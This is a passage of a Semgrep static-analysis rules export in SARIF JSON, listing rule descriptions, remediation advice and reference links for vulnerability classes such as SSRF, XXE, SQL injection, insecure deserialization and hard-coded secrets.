Finding: swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name)."},"help":{"markdown":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.ssrf.web-request.ssrf)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.ssrf.web-request.ssrf","id":"csharp.lang.security.ssrf.web-request.ssrf","name":"csharp.lang.security.ssrf.web-request.ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.ssrf.web-request.ssrf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","id":"swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","name":"swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false."},"help":{"markdown":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n","text":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","id":"java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","name":"java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","id":"java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","name":"java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details)."},"help":{"markdown":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pymongo.security.mongodb.mongo-client-bad-auth)\n - [https://cwe.mitre.org/data/definitions/477.html](https://cwe.mitre.org/data/definitions/477.html)\n","text":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details)."},"helpUri":"https://semgrep.dev/r/python.pymongo.security.mongodb.mongo-client-bad-auth","id":"python.pymongo.security.mongodb.mongo-client-bad-auth","name":"python.pymongo.security.mongodb.mongo-client-bad-auth","properties":{"precision":"very-high","tags":["CWE-477: Use of Obsolete Function","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.pymongo.security.mongodb.mongo-client-bad-auth"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/www-community/HttpOnly](https://owasp.org/www-community/HttpOnly)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","id":"java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","name":"java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text."},"help":{"markdown":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text)\n - [https://brakemanpro.com/2017/09/08/cross-site-scripting-in-rails#inline-renders---even-worse-than-xss](https://brakemanpro.com/2017/09/08/cross-site-scripting-in-rails#inline-renders---even-worse-than-xss)\n","text":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","id":"ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","name":"ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher."},"help":{"markdown":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size)\n - [https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/](https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/)\n - [https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-57Pt3r1.pdf](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-57Pt3r1.pdf)\n","text":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher."},"helpUri":"https://semgrep.dev/r/python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","id":"python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","name":"python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path."},"help":{"markdown":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.alias-path-traversal.alias-path-traversal)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/)\n - [https://www.youtube.com/watch?v=CIhHpkybYsY](https://www.youtube.com/watch?v=CIhHpkybYsY)\n - [https://github.com/orangetw/My-Presentation-Slides/blob/main/data/2018-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out.pdf](https://github.com/orangetw/My-Presentation-Slides/blob/main/data/2018-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out.pdf)\n","text":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.alias-path-traversal.alias-path-traversal","id":"generic.nginx.security.alias-path-traversal.alias-path-traversal","name":"generic.nginx.security.alias-path-traversal.alias-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.alias-path-traversal.alias-path-traversal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead."},"help":{"markdown":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command)\n - [http://docs.paramiko.org/en/stable/api/client.html#paramiko.client.SSHClient.exec_command](http://docs.paramiko.org/en/stable/api/client.html#paramiko.client.SSHClient.exec_command)\n - [https://github.com/PyCQA/bandit/blob/d5f8fa0d89d7b11442fc6ec80ca42953974354c8/bandit/plugins/injection_paramiko.py](https://github.com/PyCQA/bandit/blob/d5f8fa0d89d7b11442fc6ec80ca42953974354c8/bandit/plugins/injection_paramiko.py)\n","text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","id":"python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","name":"python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host)\n - [https://goteleport.com/blog/ssrf-attacks/](https://goteleport.com/blog/ssrf-attacks/)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","id":"go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","name":"go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"helpUri":"https://semgrep.dev/r/java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","id":"java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","name":"java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.knex-express.knex-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.knex-express.knex-express","id":"javascript.express.db.knex-express.knex-express","name":"javascript.express.db.knex-express.knex-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.knex-express.knex-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead."},"help":{"markdown":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor)\n - [https://stackoverflow.com/questions/1135186/whats-wrong-with-xor-encryption](https://stackoverflow.com/questions/1135186/whats-wrong-with-xor-encryption)\n","text":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","id":"python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","name":"python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources."},"help":{"markdown":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.exec-detected.exec-detected)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.exec-detected.exec-detected","id":"python.lang.security.audit.exec-detected.exec-detected","name":"python.lang.security.audit.exec-detected.exec-detected","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.exec-detected.exec-detected"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file."},"help":{"markdown":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings)\n - [https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#security](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#security)\n - [https://www.playframework.com/documentation/2.8.x/SettingsSession#Session-Configuration](https://www.playframework.com/documentation/2.8.x/SettingsSession#Session-Configuration)\n","text":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file."},"helpUri":"https://semgrep.dev/r/scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","id":"scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","name":"scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: 